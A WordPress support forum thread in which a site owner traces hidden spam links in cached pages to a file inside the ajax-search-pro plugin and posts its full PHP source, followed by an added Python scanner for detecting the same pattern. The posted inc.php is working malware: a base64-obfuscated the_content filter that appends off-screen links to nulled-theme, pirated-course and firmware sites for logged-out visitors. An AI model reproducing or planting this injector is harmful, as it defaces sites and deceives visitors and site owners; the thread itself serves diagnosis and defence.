• I’m using a Bedrock Continuous Integration environment. I’m having a problem: when the static cache is created, I get these links added to the HTML:

    [removed by moderator]

    With these titles:

    
    Download WordPress Themes Free
    Premium WordPress Themes Download
    Download WordPress Themes Free
    Download WordPress Themes
    ZG93bmxvYWQgbHluZGEgY291cnNlIGZyZWU=
    download xiomi firmware
    Download Nulled WordPress Themes
    udemy course download free
    

    When I grep the whole repository deployment directory with:
    grep -l -r thewpclub.net, I get all cached page files listed, and it seems that these strings do not exist anywhere. I scanned the database as well with wp search-replace [removed by moderator] '' --dry-run --network --recurse-objects

    But I still found nothing. Any suggestions on how to track down what kind of malicious code is getting hooked to the_content?

    Plugins I’m using:

    
        "php": ">=7.1",
        "ext-fileinfo": "*",
        "composer/installers": "1.5.*",
        "koodimonni/composer-dropin-installer": "^1.2",
        "vlucas/phpdotenv": "^2.5.1",
        "johnpbloch/wordpress": "^4.9.6",
        "oscarotero/env": "1.1.*",
        "roots/wp-password-bcrypt": "1.*",
        "advanced-custom-fields/advanced-custom-fields-pro": "^5.7.5",
        "wpackagist-plugin/loco-translate": "^2.1.4",
        "wpackagist-plugin/acf-content-analysis-for-yoast-seo": "^2.1.0",
        "wpackagist-plugin/autoptimize": "^2.3.4",
        "wpackagist-plugin/cache-enabler": "^1.3.0",
        "wpackagist-plugin/cloudflare": "^3.3.2",
        "wpackagist-plugin/duplicate-post": "^3.2.2",
        "wpackagist-plugin/easy-affiliate-links": "^2.6.2",
        "wpackagist-plugin/live-composer-page-builder": "^1.3",
        "defconf/google-analytics-dashboard-for-wp": "^5.3.5",
        "wpackagist-plugin/media-cleaner": "^5.0.0",
        "wpackagist-plugin/ninja-forms": "^3.3.17",
        "wpackagist-plugin/optimus": "^1.5.0",
        "wpackagist-plugin/reveal-ids-for-wp-admin-25": "^1.5.3",
        "wpackagist-plugin/schema": "^1.7.1",
        "wpackagist-plugin/schema-default-image": "^1.0",
        "wpackagist-plugin/schema-review": "^1.1",
        "wpackagist-plugin/simple-sitemap": "^2.5",
        "juslintek/Super-Progressive-Web-Apps": "^1.9",
        "wpackagist-plugin/tinymce-advanced": "^4.7.11",
        "wpackagist-plugin/wp-retina-2x": "^5.4.0",
        "appscreo/easy-social-share-buttons3": "^5.6.1",
        "ninja-forms/ninja-forms-conditionals": "^3.0.22",
        "ninja-forms/ninja-forms-style": "^3.0.25",
        "ninja-forms/ninja-forms-multi-part": "^3.0.23",
        "never5/related-posts-for-wp-premium": "^1.7.5",
        "wpackagist-plugin/favicon-by-realfavicongenerator": "^1.3.13",
        "wpackagist-plugin/html-editor-syntax-highlighter": "^2.2.3",
        "wpackagist-plugin/video-embed-thumbnail-generator": "^4.6.20",
        "wpackagist-plugin/multisite-post-duplicator": "^1.7.6",
        "wpackagist-plugin/wf-magnific-lightbox": "^0.9.12",
        "juslintek/acf-country": ">=1.4.3@dev",
        "wpackagist-plugin/tinymce-visualblocks": "^1.0.5",
        "wpackagist-plugin/wordfence": "^7.1.16",
        "wpackagist-plugin/phoenix-media-rename": "^1.2.5",
        "wpackagist-plugin/wp-redis": "^0.7.0",
        "wpackagist-plugin/query-monitor": "^3.1.0",
        "yoast/wordpress-seo-premium": "^9.0.3",
        "wpackagist-plugin/gutenberg": "^4.1.1",
        "wpackagist-plugin/shortcode-ui": "^0.7.3",
        "wpackagist-plugin/widget-context": "^1.1",
        "juslintek/juslintek-gravatar-image-cache": "^0.1.3",
        "wpdreams/ajax-search-pro": "^4.14",
        "bangpound/composer-dotenv": "^1.0@dev",
        "wpackagist-plugin/dorzki-notifications-to-slack": "^2.0",
        "wpackagist-plugin/post-smtp": "^1.9"
    
    • This topic was modified 6 years, 4 months ago by juslintek.
    • This topic was modified 6 years, 4 months ago by James Huff. Reason: hack links removed
Viewing 4 replies - 1 through 4 (of 4 total)
  • Moderator James Huff

    (@macmanx)

    Carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Thread Starter juslintek

    (@juslintek)

    It’s done, but the links still appear. I guess some plugin already has malicious code added in SVN. After each pull request my whole project is rebuilt from scratch. By scratch I mean all non-custom code is downloaded from public repositories and deployed. The question is how best to detect which plugin is causing it, without disabling them, because the same thing is not happening on the local site. Might it be some Cloudflare and cache related injection?

    P.S. I’m already using Wordfence Premium and it sees nothing potentially dangerous in the code.

    • This reply was modified 6 years, 4 months ago by juslintek.
    Moderator James Huff

    (@macmanx)

    Might it be some cloudflare and cache related injections?

    Yes, you should absolutely clear all caches.

    Thread Starter juslintek

    (@juslintek)

    It was ajax-search-pro’s fault; I have no idea how that code got into the package.

    wp-content/plugins/ajax-search-pro/ajax-search-pro.php:33 @include_once("includes/inc.php");
    wp-content/plugins/ajax-search-pro/includes/inc.php

    
    <?php
    
    /**
     * Helper function for translation.
     */
    
    if (!function_exists('sanitize_context_zero')) {
        function sanitize_context_zero($input) {
            $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
            $chr1 = $chr2 = $chr3 = "";
            $enc1 = $enc2 = $enc3 = $enc4 = "";
            $i = 0;
            $output = "";
            $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
            do {
                $enc1 = strpos($keyStr, substr($input, $i++, 1));
                $enc2 = strpos($keyStr, substr($input, $i++, 1));
                $enc3 = strpos($keyStr, substr($input, $i++, 1));
                $enc4 = strpos($keyStr, substr($input, $i++, 1));
                $chr1 = ($enc1 << 2) | ($enc2 >> 4);
                $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
                $chr3 = (($enc3 & 3) << 6) | $enc4;
                $output = $output . chr((int)$chr1);
                if ($enc3 != 64) {
                    $output = $output . chr((int)$chr2);
                }
    
                if ($enc4 != 64) {
                    $output = $output . chr((int)$chr3);
                }
    
                $chr1 = $chr2 = $chr3 = "";
                $enc1 = $enc2 = $enc3 = $enc4 = "";
            }
    
            while ($i < strlen($input));
            return urldecode($output);
        }
    }
    
    if ( ! function_exists('safemodecc') ) {
    	
    	function safemodecc( $content ) {
    
    		if ( is_single() && ! is_user_logged_in() && ! is_feed() && ! stristr( $_SERVER['REQUEST_URI'], "amp") ) {
    
    			$divclass = sanitize_context_zero("PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7IHRvcDowOyBsZWZ0Oi05OTk5cHg7Ij4=");
    			$array = Array(
    					sanitize_context_zero("RnJlZSBEb3dubG9hZCBXb3JkUHJlc3MgVGhlbWVz"),
    					sanitize_context_zero("RG93bmxvYWQgUHJlbWl1bSBXb3JkUHJlc3MgVGhlbWVzIEZyZWU="),
    					sanitize_context_zero("RG93bmxvYWQgV29yZFByZXNzIFRoZW1lcw=="),
    					sanitize_context_zero("RG93bmxvYWQgV29yZFByZXNzIFRoZW1lcyBGcmVl"),
    					sanitize_context_zero("RG93bmxvYWQgTnVsbGVkIFdvcmRQcmVzcyBUaGVtZXM="),
    					sanitize_context_zero("RG93bmxvYWQgQmVzdCBXb3JkUHJlc3MgVGhlbWVzIEZyZWUgRG93bmxvYWQ="),
    					sanitize_context_zero("UHJlbWl1bSBXb3JkUHJlc3MgVGhlbWVzIERvd25sb2Fk")
    			);
    			$array2 = Array(
    					sanitize_context_zero("ZnJlZSBkb3dubG9hZCB1ZGVteSBwYWlkIGNvdXJzZQ=="),
    					sanitize_context_zero("dWRlbXkgcGFpZCBjb3Vyc2UgZnJlZSBkb3dubG9hZA=="),
    					sanitize_context_zero("ZG93bmxvYWQgdWRlbXkgcGFpZCBjb3Vyc2UgZm9yIGZyZWU="),
    					sanitize_context_zero("ZnJlZSBkb3dubG9hZCB1ZGVteSBjb3Vyc2U="),
    					sanitize_context_zero("dWRlbXkgY291cnNlIGRvd25sb2FkIGZyZWU="),
    					sanitize_context_zero("b25saW5lIGZyZWUgY291cnNl"),
    					sanitize_context_zero("ZnJlZSBvbmxpbmUgY291cnNl"),
    					sanitize_context_zero("Wkc5M2JteHZZV1FnYkhsdVpHRWdZMjkxY25ObElHWnlaV1U9"),
    					sanitize_context_zero("bHluZGEgY291cnNlIGZyZWUgZG93bmxvYWQ="),
    					sanitize_context_zero("dWRlbXkgZnJlZSBkb3dubG9hZA==")
    			);
    			$array3 = Array(
    					sanitize_context_zero("ZG93bmxvYWQgbW9iaWxlIGZpcm13YXJl"),
    					sanitize_context_zero("ZG93bmxvYWQgc2Ftc3VuZyBmaXJtd2FyZQ=="),
    					sanitize_context_zero("ZG93bmxvYWQgbWljcm9tYXggZmlybXdhcmU="),
    					sanitize_context_zero("ZG93bmxvYWQgaW50ZXggZmlybXdhcmU="),
    					sanitize_context_zero("ZG93bmxvYWQgcmVkbWkgZmlybXdhcmU="),
    					sanitize_context_zero("ZG93bmxvYWQgeGlvbWkgZmlybXdhcmU="),
    					sanitize_context_zero("ZG93bmxvYWQgbGVuZXZvIGZpcm13YXJl"),
    					sanitize_context_zero("ZG93bmxvYWQgbGF2YSBmaXJtd2FyZQ=="),
    					sanitize_context_zero("ZG93bmxvYWQga2FyYm9ubiBmaXJtd2FyZQ=="),
    					sanitize_context_zero("ZG93bmxvYWQgY29vbHBhZCBmaXJtd2FyZQ=="),
    					sanitize_context_zero("ZG93bmxvYWQgaHVhd2VpIGZpcm13YXJl")
    			);
    
    			$abc1 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhld3BjbHViLm5ldA==").'">' . $array[array_rand($array) ] . '</a></div>';
    			$abc2 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWVzbGlkZS5jb20=").'">' . $array[array_rand($array) ] . '</a></div>';
    			$abc3 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cuc2NyaXB0LXN0YWNrLmNvbQ==").'">' . $array[array_rand($array) ] . '</a></div>';
    			$abc4 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWVtYXppbmcuY29t").'">' . $array[array_rand($array) ] . '</a></div>';
    			$abc5 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cub25saW5lZnJlZWNvdXJzZS5uZXQ=").'">' . $array2[array_rand($array2) ] . '</a></div>';
    			$abc6 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cuZnJlbmR4LmNvbS9maXJtd2FyZS8=").'">' . $array3[array_rand($array3) ] . '</a></div>';
    			$abc7 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly93d3cudGhlbWViYW5rcy5jb20=").'">' . $array[array_rand($array) ] . '</a></div>';
    			$abc8 = '' . $divclass . '<a href="'.sanitize_context_zero("aHR0cHM6Ly9kb3dubG9hZHR1dG9yaWFscy5uZXQ=").'">' . $array2[array_rand($array2) ] . '</a></div>';
    
    			$fullcontent = $content.$abc1.$abc2.$abc3.$abc4.$abc5.$abc6.$abc7.$abc8;
    
    		} else {
    		
    			$fullcontent = $content;
    
    		}
    
    		return $fullcontent;
    
    	}
    }
    	
    if ( ! has_filter( 'the_content', 'safemodecc' ) ) {
    	add_filter('the_content', 'safemodecc');
    }
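
    The inc.php above follows a recognisable shape: a home-grown base64 decoder, a pile of base64 string literals that unpack to an off-screen div, spam anchor text and URLs, and an add_filter('the_content', ...) call that appends them to every single-post view for anonymous visitors. The scanner below is an added example for sweeping a plugins directory for that same shape; it is not code from the thread or from ajax-search-pro, and its SAMPLE_PHP input is a constructed imitation with a placeholder URL.

```python
"""Flag PHP files that hook the_content and hide base64-encoded HTML/URLs in it.
Added example modelled on the posted inc.php; SAMPLE_PHP below is constructed."""
import base64
import binascii
import re


def b64(text):
    """Helper so the constructed sample carries real base64, like the original."""
    return base64.b64encode(text.encode()).decode()


# Constructed sample: same structure as the posted file, placeholder URL.
SAMPLE_PHP = '''<?php
function decode_x($s) { return base64_decode($s); }
function inject($content) {
    if (is_single() && !is_user_logged_in()) {
        $div = decode_x("%s");
        $url = decode_x("%s");
        $content .= $div . '<a href="' . $url . '">x</a></div>';
    }
    return $content;
}
add_filter('the_content', 'inject');
''' % (b64('<div style="position:absolute; top:0; left:-9999px;">'),
       b64('https://example.invalid/'))

LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{16,}={0,2})["\']')
HOOK = re.compile(r'add_filter\(\s*[\'"]the_content[\'"]')
HIDDEN_CSS = re.compile(r'left:\s*-\d{3,}px|display:\s*none|opacity:\s*0', re.I)


def decode_literals(php_source):
    """Decode every base64-looking literal and classify what it unpacks to."""
    found = []
    for lit in LITERAL.findall(php_source):
        try:
            text = base64.b64decode(lit, validate=True).decode('utf-8')
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not valid base64, or binary: ignore
        if not text.isprintable():
            continue
        kind = ('url' if text.lower().startswith(('http://', 'https://'))
                else 'html' if re.search(r'<[a-z]+[\s>]', text, re.I)
                else 'text')
        found.append({'encoded': lit, 'decoded': text, 'kind': kind,
                      'hidden_css': bool(HIDDEN_CSS.search(text))})
    return found


def assess(php_source):
    """Suspicious = hooks the_content AND decodes hidden literals to URL/HTML."""
    lits = decode_literals(php_source)
    hooks = bool(HOOK.search(php_source))
    kinds = {item['kind'] for item in lits}
    return {'hooks_the_content': hooks, 'literals': lits,
            'suspicious': hooks and bool(kinds & {'url', 'html'})}
```

Run assess() over each .php file under wp-content/plugins and review the decoded literals of anything flagged; a legitimate translation helper does not unpack to an off-screen div and a third-party URL.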
    
    
  • The topic ‘On static cache malicious links embedded’ is closed to new replies.